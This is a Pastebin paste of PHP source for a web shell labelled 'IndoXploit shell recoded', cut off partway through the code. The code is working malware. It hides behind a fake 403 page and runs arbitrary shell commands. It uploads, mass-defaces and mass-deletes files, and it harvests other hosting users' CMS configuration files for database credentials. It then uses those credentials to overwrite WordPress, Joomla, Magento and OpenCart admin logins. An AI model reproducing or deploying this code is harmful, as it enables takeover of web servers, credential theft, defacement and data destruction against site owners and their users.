Guest User

Shell gua

a guest
Dec 2nd, 2016
282
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 58.50 KB | None | 0 0
  1. <?php
  2. //#################################
  3. //##IndoXploit shell recoded ##
  4. //# ##
  5. //##Password = loscardos ##
  6. //#################################
  7. $auth_pass = "1657539f30df8dea0ffa009b668e6949";
  8.  
  9. $color = "#00ff00";
  10. $default_action = 'FilesMan';
  11. @define('SELF_PATH', __FILE__);
  12. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  13. header('HTTP/1.0 404 Not Found');
  14. exit;
  15. }
  16. @session_start();
  17. @error_reporting(0);
  18. @ini_set('error_log',NULL);
  19. @ini_set('log_errors',0);
  20. @ini_set('max_execution_time',0);
  21. @ini_set('output_buffering',0);
  22. @ini_set('display_errors', 0);
  23. @set_time_limit(0);
  24. @set_magic_quotes_runtime(0);
  25. @define('VERSION', '2.1');
  26. if( get_magic_quotes_gpc() ) {
  27. function stripslashes_array($array) {
  28. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  29. }
  30. $_POST = stripslashes_array($_POST);
  31. }
  32. function printLogin() {
  33. ?>
  34. echo"
  35. <title> Forbidden</title>
  36. </head><body>
  37. <div id='forbid'>
  38. <h1>Forbidden</h1>
  39.  
  40. <p>You don't have permission to access URL on this server.<br>
  41. Server unable to read htaccess file, denying access to be safe
  42. <br><br>
  43. Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p></div>";
  44.  
  45. if($_GET['login']=='3RR0R'){
  46.  
  47. echo'
  48. <style>
  49. body{
  50. background:#000;
  51. backgroud-size:100%;
  52. }
  53. input{
  54. text-align:center;
  55. border-top:3px solid blue;
  56. border-left:3px solid blue;
  57. border-bottom:3px solid #fff;
  58. border-right:3px solid #fff;
  59. background:transparent;
  60. color:#333;
  61. }
  62. input:hover{
  63. transition-duration:0.5s;
  64. -o-transition-duration:0.5s;
  65. -moz-transition-duration:0.5s;
  66. -webkit-transition-duration:0.5s;
  67. border-style:dashed;
  68. cursor:pointer;
  69. }
  70. #forbid{
  71. display:none;
  72. }
  73. table{
  74. margin-top:25px;
  75. }
  76. </style>
  77. <center>
  78. <form method="post">
  79. <img src="http://i.imgur.com/fW1hCGC.png" width=234 height=234/>
  80. <table title="selamat datang <?=$_SERVER['REMOTE_ADDR']?> di shell ">
  81. <tr><td colspan=2><h1 style="color:red;text-shadow:2px 3px 5px #fff;"><center>[ XaiSyndicate ]</h1><br><font color=white> <center>Welcome <b>Guest</b> TO Shell <?=$_SERVER['HTTP_HOST']?></font></td></tr>
  82. <tr><td><font color=blue size=5 face=courier new> Username :</font></td><td>
  83. <input type="text" value="XaiSyndicate" title="you can't change this username." disabled></td></tr>
  84. <tr><td><font color=white size=5 face=courier new>Password :</font></td><td>
  85. <input type="password" name="pass" ></td></tr>
  86. <tr><td colspan=2><input type="submit" value="login!" style="width:100%;color:white;"></td></tr>
  87. </table>
  88. </center>
  89. ';
  90. }
  91. <?php
  92. exit;
  93. }
  94. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  95. if( empty( $auth_pass ) ||
  96. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  97. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  98. else
  99. printLogin();
  100. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  101. @ob_clean();
  102. $file = $_GET['file'];
  103. header('Content-Description: File Transfer');
  104. header('Content-Type: application/octet-stream');
  105. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  106. header('Expires: 0');
  107. header('Cache-Control: must-revalidate');
  108. header('Pragma: public');
  109. header('Content-Length: ' . filesize($file));
  110. readfile($file);
  111. exit;
  112. }
  113. ?>
  114. <html>
  115. <head>
  116. <title>LoscardosMandoza</title>
  117. <meta name='author' content='IndoXploit'>
  118. <meta charset="UTF-8">
  119. <style type='text/css'>
  120. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  121. html {
  122. background: #000000;
  123. color: #FFFF00;
  124. font-family: 'Ubuntu';
  125. font-size: 13px;
  126. width: 100%;
  127. }
  128. li {
  129. display: inline;
  130. margin: 5px;
  131. padding: 5px;
  132. }
  133. table, th, td {
  134. border-collapse:collapse;
  135. font-family: Tahoma, Geneva, sans-serif;
  136. background: transparent;
  137. font-family: 'Ubuntu';
  138. font-size: 13px;
  139. }
  140. .table_home, .th_home, .td_home {
  141. border: 1px solid #000000;
  142. }
  143. th {
  144. padding: 10px;
  145. }
  146. a {
  147. color: #FFFF00;
  148. text-decoration: none;
  149. }
  150. a:hover {
  151. color: gold;
  152. text-decoration: underline;
  153. }
  154. b {
  155. color: gold;
  156. }
  157. input[type=text], input[type=password],input[type=submit] {
  158. background: transparent;
  159. color: #FFFF00;
  160. border: 1px solid #FFFF00;
  161. margin: 5px auto;
  162. padding-left: 5px;
  163. font-family: 'Ubuntu';
  164. font-size: 13px;
  165. }
  166. textarea {
  167. border: 1px solid #FFFF00;
  168. width: 100%;
  169. height: 400px;
  170. padding-left: 5px;
  171. margin: 10px auto;
  172. resize: none;
  173. background: transparent;
  174. color: #FFFF00;
  175. font-family: 'Ubuntu';
  176. font-size: 13px;
  177. }
  178. select {
  179. width: 152px;
  180. background: #0066FF;
  181. color: lime;
  182. border: 1px solid #FFFF00;
  183. margin: 5px auto;
  184. padding-left: 5px;
  185. font-family: 'Ubuntu';
  186. font-size: 13px;
  187. }
  188. option:hover {
  189. background: lime;
  190. color: #0066FF;
  191. }
  192. </style>
  193. </head>
  194. <?php
  195. function w($dir,$perm) {
  196. if(!is_writable($dir)) {
  197. return "<font color=red>".$perm."</font>";
  198. } else {
  199. return "<font color=lime>".$perm."</font>";
  200. }
  201. }
  202. function r($dir,$perm) {
  203. if(!is_readable($dir)) {
  204. return "<font color=red>".$perm."</font>";
  205. } else {
  206. return "<font color=lime>".$perm."</font>";
  207. }
  208. }
  209. function exe($cmd) {
  210. if(function_exists('system')) {
  211. @ob_start();
  212. @system($cmd);
  213. $buff = @ob_get_contents();
  214. @ob_end_clean();
  215. return $buff;
  216. } elseif(function_exists('exec')) {
  217. @exec($cmd,$results);
  218. $buff = "";
  219. foreach($results as $result) {
  220. $buff .= $result;
  221. } return $buff;
  222. } elseif(function_exists('passthru')) {
  223. @ob_start();
  224. @passthru($cmd);
  225. $buff = @ob_get_contents();
  226. @ob_end_clean();
  227. return $buff;
  228. } elseif(function_exists('shell_exec')) {
  229. $buff = @shell_exec($cmd);
  230. return $buff;
  231. }
  232. }
  233. function perms($file){
  234. $perms = fileperms($file);
  235. if (($perms & 0xC000) == 0xC000) {
  236. // Socket
  237. $info = 's';
  238. } elseif (($perms & 0xA000) == 0xA000) {
  239. // Symbolic Link
  240. $info = 'l';
  241. } elseif (($perms & 0x8000) == 0x8000) {
  242. // Regular
  243. $info = '-';
  244. } elseif (($perms & 0x6000) == 0x6000) {
  245. // Block special
  246. $info = 'b';
  247. } elseif (($perms & 0x4000) == 0x4000) {
  248. // Directory
  249. $info = 'd';
  250. } elseif (($perms & 0x2000) == 0x2000) {
  251. // Character special
  252. $info = 'c';
  253. } elseif (($perms & 0x1000) == 0x1000) {
  254. // FIFO pipe
  255. $info = 'p';
  256. } else {
  257. // Unknown
  258. $info = 'u';
  259. }
  260. // Owner
  261. $info .= (($perms & 0x0100) ? 'r' : '-');
  262. $info .= (($perms & 0x0080) ? 'w' : '-');
  263. $info .= (($perms & 0x0040) ?
  264. (($perms & 0x0800) ? 's' : 'x' ) :
  265. (($perms & 0x0800) ? 'S' : '-'));
  266. // Group
  267. $info .= (($perms & 0x0020) ? 'r' : '-');
  268. $info .= (($perms & 0x0010) ? 'w' : '-');
  269. $info .= (($perms & 0x0008) ?
  270. (($perms & 0x0400) ? 's' : 'x' ) :
  271. (($perms & 0x0400) ? 'S' : '-'));
  272. // World
  273. $info .= (($perms & 0x0004) ? 'r' : '-');
  274. $info .= (($perms & 0x0002) ? 'w' : '-');
  275. $info .= (($perms & 0x0001) ?
  276. (($perms & 0x0200) ? 't' : 'x' ) :
  277. (($perms & 0x0200) ? 'T' : '-'));
  278. return $info;
  279. }
  280. function hdd($s) {
  281. if($s >= 1073741824)
  282. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  283. elseif($s >= 1048576)
  284. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  285. elseif($s >= 1024)
  286. return sprintf('%1.2f',$s / 1024 ) .' KB';
  287. else
  288. return $s .' B';
  289. }
  290. function ambilKata($param, $kata1, $kata2){
  291. if(strpos($param, $kata1) === FALSE) return FALSE;
  292. if(strpos($param, $kata2) === FALSE) return FALSE;
  293. $start = strpos($param, $kata1) + strlen($kata1);
  294. $end = strpos($param, $kata2, $start);
  295. $return = substr($param, $start, $end - $start);
  296. return $return;
  297. }
  298. if(get_magic_quotes_gpc()) {
  299. function idx_ss($array) {
  300. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  301. }
  302. $_POST = idx_ss($_POST);
  303. }
  304.  
  305. error_reporting(0);
  306. @ini_set('error_log',NULL);
  307. @ini_set('log_errors',0);
  308. @ini_set('max_execution_time',0);
  309. @set_time_limit(0);
  310. @set_magic_quotes_runtime(0);
  311. if(isset($_GET['dir'])) {
  312. $dir = $_GET['dir'];
  313. chdir($dir);
  314. } else {
  315. $dir = getcwd();
  316. }
  317. $dir = str_replace("\\","/",$dir);
  318. $scdir = explode("/", $dir);
  319. $freespace = hdd(disk_free_space("/"));
  320. $total = hdd(disk_total_space("/"));
  321. $used = $total - $freespace;
  322. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  323. $ds = @ini_get("disable_functions");
  324. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  325. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  326. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  327. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  328. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  329. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  330. if(!function_exists('posix_getegid')) {
  331. $user = @get_current_user();
  332. $uid = @getmyuid();
  333. $gid = @getmygid();
  334. $group = "?";
  335. } else {
  336. $uid = @posix_getpwuid(posix_geteuid());
  337. $gid = @posix_getgrgid(posix_getegid());
  338. $user = $uid['name'];
  339. $uid = $uid['uid'];
  340. $group = $gid['name'];
  341. $gid = $gid['gid'];
  342. }
  343. echo "System: <font color=lime>".php_uname()."</font><br>";
  344. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  345. echo "Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  346. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  347. echo "Safe Mode: $sm<br>";
  348. echo "Disable Functions: $show_ds<br>";
  349. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  350. echo "Current DIR: ";
  351. foreach($scdir as $c_dir => $cdir) {
  352. echo "<a href='?dir=";
  353. for($i = 0; $i <= $c_dir; $i++) {
  354. echo $scdir[$i];
  355. if($i != $c_dir) {
  356. echo "/";
  357. }
  358. }
  359. echo "'>$cdir</a>/";
  360. }
  361. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  362. echo "<hr>";
  363. echo "<center>";
  364. echo "<ul>";
  365. echo "<li>[ <a href='?'>Home</a> ]</li>";
  366. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  367. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  368. echo "<li>[<a href='?dir=$dir&do=csrfup'>CSRF Exploiter</a>]</li>";
  369. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  370. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  371. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  372. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  373. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  374. echo "<li>[ <a href='?dir=$dir&do=tools'>Tools</a>]</li>";
  375. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  376. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  377. echo "<li>[<a href='?dir=$dir&do=defacerid'>Defacer.ID</a>]</li>";
  378. echo "<li><br>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  379. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  380. echo "</ul>";
  381. echo "</center>";
  382. echo "<hr>";
  383. if($_GET['do'] == 'upload') {
  384. echo "<center>";
  385. if($_POST['upload']) {
  386. if($_POST['tipe_upload'] == 'biasa') {
  387. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  388. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  389. } else {
  390. $act = "<font color=red>failed to upload file</font>";
  391. }
  392. } else {
  393. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  394. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  395. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  396. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  397. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  398. } else {
  399. $act = "<font color=red>failed to upload file</font>";
  400. }
  401. } else {
  402. $act = "<font color=red>failed to upload file</font>";
  403. }
  404. }
  405. }
  406. echo "Upload File:
  407. <form method='post' enctype='multipart/form-data'>
  408. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  409. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  410. <input type='file' name='ix_file'>
  411. <input type='submit' value='upload' name='upload'>
  412. </form>";
  413. echo $act;
  414. echo "</center>";
  415. } elseif($_GET['do'] == 'mass_deface') {
  416. function sabun_massal($dir,$namafile,$isi_script) {
  417. if(is_writable($dir)) {
  418. $dira = scandir($dir);
  419. foreach($dira as $dirb) {
  420. $dirc = "$dir/$dirb";
  421. $lokasi = $dirc.'/'.$namafile;
  422. if($dirb === '.') {
  423. file_put_contents($lokasi, $isi_script);
  424. } elseif($dirb === '..') {
  425. file_put_contents($lokasi, $isi_script);
  426. } else {
  427. if(is_dir($dirc)) {
  428. if(is_writable($dirc)) {
  429. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  430. file_put_contents($lokasi, $isi_script);
  431. $idx = sabun_massal($dirc,$namafile,$isi_script);
  432. }
  433. }
  434. }
  435. }
  436. }
  437. }
  438. function sabun_biasa($dir,$namafile,$isi_script) {
  439. if(is_writable($dir)) {
  440. $dira = scandir($dir);
  441. foreach($dira as $dirb) {
  442. $dirc = "$dir/$dirb";
  443. $lokasi = $dirc.'/'.$namafile;
  444. if($dirb === '.') {
  445. file_put_contents($lokasi, $isi_script);
  446. } elseif($dirb === '..') {
  447. file_put_contents($lokasi, $isi_script);
  448. } else {
  449. if(is_dir($dirc)) {
  450. if(is_writable($dirc)) {
  451. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  452. file_put_contents($lokasi, $isi_script);
  453. }
  454. }
  455. }
  456. }
  457. }
  458. }
  459. if($_POST['start']) {
  460. if($_POST['tipe_sabun'] == 'mahal') {
  461. echo "<div style='margin: 5px auto; padding: 5px'>";
  462. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  463. echo "</div>";
  464. } elseif($_POST['tipe_sabun'] == 'murah') {
  465. echo "<div style='margin: 5px auto; padding: 5px'>";
  466. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  467. echo "</div>";
  468. }
  469. } else {
  470. echo "<center>";
  471. echo "<form method='post'>
  472. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  473. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  474. <font style='text-decoration: underline;'>Folder:</font><br>
  475. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  476. <font style='text-decoration: underline;'>Filename:</font><br>
  477. <input type='text' name='d_file' value='xai.php' style='width: 450px;' height='10'><br>
  478. <font style='text-decoration: underline;'>Index File:</font><br>
  479. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Indonesian People -XaiSyndicate</textarea><br>
  480. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  481. </form></center>";
  482. }
  483. } elseif($_GET['do'] == 'mass_delete') {
  484. function hapus_massal($dir,$namafile) {
  485. if(is_writable($dir)) {
  486. $dira = scandir($dir);
  487. foreach($dira as $dirb) {
  488. $dirc = "$dir/$dirb";
  489. $lokasi = $dirc.'/'.$namafile;
  490. if($dirb === '.') {
  491. if(file_exists("$dir/$namafile")) {
  492. unlink("$dir/$namafile");
  493. }
  494. } elseif($dirb === '..') {
  495. if(file_exists("".dirname($dir)."/$namafile")) {
  496. unlink("".dirname($dir)."/$namafile");
  497. }
  498. } else {
  499. if(is_dir($dirc)) {
  500. if(is_writable($dirc)) {
  501. if(file_exists($lokasi)) {
  502. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  503. unlink($lokasi);
  504. $idx = hapus_massal($dirc,$namafile);
  505. }
  506. }
  507. }
  508. }
  509. }
  510. }
  511. }
  512. if($_POST['start']) {
  513. echo "<div style='margin: 5px auto; padding: 5px'>";
  514. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  515. echo "</div>";
  516. } else {
  517. echo "<center>";
  518. echo "<form method='post'>
  519. <font style='text-decoration: underline;'>Folder:</font><br>
  520. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  521. <font style='text-decoration: underline;'>Filename:</font><br>
  522. <input type='text' name='d_file' value='xai.php' style='width: 450px;' height='10'><br>
  523. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  524. </form></center>";
  525. }
  526. } elseif($_GET['do'] == 'config') {
  527. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  528. $idx = mkdir("xai_config", 0777);
  529. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  530. $htc = fopen("xai_config/.htaccess","w");
  531. fwrite($htc, $isi_htc);
  532. while($passwd = fgets($etc)) {
  533. if($passwd == "" || !$etc) {
  534. echo "<font color=red>Can't read /etc/passwd</font>";
  535. } else {
  536. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  537. foreach($user_config[1] as $user_idx) {
  538. $user_config_dir = "/home/$user_idx/public_html/";
  539. if(is_readable($user_config_dir)) {
  540. $grab_config = array(
  541. "/home/$user_idx/.my.cnf" => "cpanel",
  542. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  543. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  544. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  545. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  546. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  547. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  548. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  549. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  550. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  551. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  552. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  553. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  554. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  555. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  556. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  557. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  558. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  559. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  560. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  561. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  562. foreach($grab_config as $config => $nama_config) {
  563. $ambil_config = file_get_contents($config);
  564. if($ambil_config == '') {
  565. } else {
  566. $file_config = fopen("xai_config/$user_idx-$nama_config.txt","w");
  567. fputs($file_config,$ambil_config);
  568. }
  569. }
  570. }
  571. }
  572. }
  573. }
  574. echo "<center><a href='?dir=$dir/xai_config'><font color=lime>Done</font></a></center>";
  575. } elseif($_GET['do'] == 'jumping') {
  576. $i = 0;
  577. echo "<pre><div class='margin: 5px auto;'>";
  578. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  579. while($passwd = fgets($etc)) {
  580. if($passwd == '' || !$etc) {
  581. echo "<font color=red>Can't read /etc/passwd</font>";
  582. } else {
  583. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  584. foreach($user_jumping[1] as $user_idx_jump) {
  585. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  586. if(is_readable($user_jumping_dir)) {
  587. $i++;
  588. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  589. if(is_writable($user_jumping_dir)) {
  590. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  591. }
  592. echo $jrw;
  593. if(function_exists('posix_getpwuid')) {
  594. $domain_jump = file_get_contents("/etc/named.conf");
  595. if($domain_jump == '') {
  596. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  597. } else {
  598. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  599. foreach($domains_jump[1] as $dj) {
  600. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  601. $user_jumping_url = $user_jumping_url['name'];
  602. if($user_jumping_url == $user_idx_jump) {
  603. echo " => ( <u>$dj</u> )<br>";
  604. break;
  605. }
  606. }
  607. }
  608. } else {
  609. echo "<br>";
  610. }
  611. }
  612. }
  613. }
  614. }
  615. if($i == 0) {
  616. } else {
  617. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  618. }
  619. echo "</div></pre>";
  620. } elseif($_GET['do'] == 'auto_edit_user') {
  621. if($_POST['hajar']) {
  622. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  623. echo "username atau password harus lebih dari 6 karakter";
  624. } else {
  625. $user_baru = $_POST['user_baru'];
  626. $pass_baru = md5($_POST['pass_baru']);
  627. $conf = $_POST['config_dir'];
  628. $scan_conf = scandir($conf);
  629. foreach($scan_conf as $file_conf) {
  630. if(!is_file("$conf/$file_conf")) continue;
  631. $config = file_get_contents("$conf/$file_conf");
  632. if(preg_match("/JConfig|joomla/",$config)) {
  633. $dbhost = ambilkata($config,"host = '","'");
  634. $dbuser = ambilkata($config,"user = '","'");
  635. $dbpass = ambilkata($config,"password = '","'");
  636. $dbname = ambilkata($config,"db = '","'");
  637. $dbprefix = ambilkata($config,"dbprefix = '","'");
  638. $prefix = $dbprefix."users";
  639. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  640. $db = mysql_select_db($dbname);
  641. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  642. $result = mysql_fetch_array($q);
  643. $id = $result['id'];
  644. $site = ambilkata($config,"sitename = '","'");
  645. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  646. echo "Config => ".$file_conf."<br>";
  647. echo "CMS => Joomla<br>";
  648. if($site == '') {
  649. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  650. } else {
  651. echo "Sitename => $site<br>";
  652. }
  653. if(!$update OR !$conn OR !$db) {
  654. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  655. } else {
  656. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  657. }
  658. mysql_close($conn);
  659. } elseif(preg_match("/WordPress/",$config)) {
  660. $dbhost = ambilkata($config,"DB_HOST', '","'");
  661. $dbuser = ambilkata($config,"DB_USER', '","'");
  662. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  663. $dbname = ambilkata($config,"DB_NAME', '","'");
  664. $dbprefix = ambilkata($config,"table_prefix = '","'");
  665. $prefix = $dbprefix."users";
  666. $option = $dbprefix."options";
  667. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  668. $db = mysql_select_db($dbname);
  669. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  670. $result = mysql_fetch_array($q);
  671. $id = $result[ID];
  672. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  673. $result2 = mysql_fetch_array($q2);
  674. $target = $result2[option_value];
  675. if($target == '') {
  676. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  677. } else {
  678. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  679. }
  680. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  681. echo "Config => ".$file_conf."<br>";
  682. echo "CMS => Wordpress<br>";
  683. echo $url_target;
  684. if(!$update OR !$conn OR !$db) {
  685. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  686. } else {
  687. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  688. }
  689. mysql_close($conn);
  690. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  691. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  692. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  693. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  694. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  695. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  696. $prefix = $dbprefix."admin_user";
  697. $option = $dbprefix."core_config_data";
  698. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  699. $db = mysql_select_db($dbname);
  700. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  701. $result = mysql_fetch_array($q);
  702. $id = $result[user_id];
  703. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  704. $result2 = mysql_fetch_array($q2);
  705. $target = $result2[value];
  706. if($target == '') {
  707. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  708. } else {
  709. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  710. }
  711. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  712. echo "Config => ".$file_conf."<br>";
  713. echo "CMS => Magento<br>";
  714. echo $url_target;
  715. if(!$update OR !$conn OR !$db) {
  716. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  717. } else {
  718. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  719. }
  720. mysql_close($conn);
  721. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  722. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  723. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  724. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  725. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  726. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  727. $prefix = $dbprefix."user";
  728. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  729. $db = mysql_select_db($dbname);
  730. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  731. $result = mysql_fetch_array($q);
  732. $id = $result[user_id];
  733. $target = ambilkata($config,"HTTP_SERVER', '","'");
  734. if($target == '') {
  735. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  736. } else {
  737. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  738. }
  739. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  740. echo "Config => ".$file_conf."<br>";
  741. echo "CMS => OpenCart<br>";
  742. echo $url_target;
  743. if(!$update OR !$conn OR !$db) {
  744. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  745. } else {
  746. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  747. }
  748. mysql_close($conn);
  749. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  750. $dbhost = ambilkata($config,'server = "','"');
  751. $dbuser = ambilkata($config,'username = "','"');
  752. $dbpass = ambilkata($config,'password = "','"');
  753. $dbname = ambilkata($config,'database = "','"');
